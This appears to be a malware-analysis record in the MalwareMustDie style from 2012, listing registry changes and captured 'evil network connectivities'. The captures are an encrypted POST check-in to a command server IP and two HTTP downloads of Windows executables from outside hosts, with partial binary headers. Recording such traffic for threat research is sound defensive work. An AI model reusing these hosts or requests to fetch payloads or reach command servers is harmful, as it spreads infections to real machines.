HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000004 HKU\S-1-5-21-1214440339-926492609-1644491937-1003\SessionInformation\ProgramCount: 0x00000006 ============================================== EVIL NETWORK CONNECTIVITIES.............. ============================================== (1)POST /forum/viewtopic.php HTTP/1.0 Host: 108.178.59.34 Accept: */* Accept-Encoding: identity, *;q=0 Content-Length: 255 Connection: close Content-Type: application/octet-stream Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) CRYPTED0.....?E..+..?X.Q...M.....i....fx....F.hp.q.....2.=B ..*..8..EA`....sj[.....O...2.#Ic.4H..BE...s..$.i.,X.....o.U ..5....GCP..7=.Jt.vpq5o.+.....)u(....?.$....`...O...u.n.... ...V.....+Y.u .{..}X?V.h..x.....*.5.Gy.(...>)..1....@.B.B..; =C.f..<.\......B.*HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Wed, 17 Oct 2012 04:17:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.14-1~dotdeb.0 ----------- (2)GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) HTTP/1.1 200 OK Date: Wed, 17 Oct 2012 04:13:17 GMT Server: Apache Last-Modified: Wed, 17 Oct 2012 04:10:03 GMT Accept-Ranges: bytes Content-Length: 407128 Connection: close Content-Type: application/x-msdownload MZ......................@.......................................... .....!..L.!This program cannot be run in DOS mode. $.......PE..L... ---------------------------------------- (3)GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252 Accept: */* Accept-Encoding: identity, *;q=0 Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) HTTP/1.1 200 OK Date: Wed, 17 Oct 2012 04:09:24 GMT Server: Apache/2.2.22 (Debian) Last-Modified: Wed, 17 Oct 2012 04:06:07 GMT ETag: "242fca-63658-4cc3963d6a094" Accept-Ranges: bytes Content-Length: 407128 Connection: close Content-Type: application/x-msdos-program MZ......................@...............................................! This program cannot be run in DOS mode.$.......PE..L....(~P.............. .Z....................@.......................... ...................... ......................................................................U.. ..E..M.....E..U..E..M...A.U..E..E..M.....U..E...]...U......E..E..M..M..E. .E......E...]....U...E.P.M.Q.U.R.|......]........U..Q.E.."...E.."...E..". #MalwareMustDie!!!!!!!!!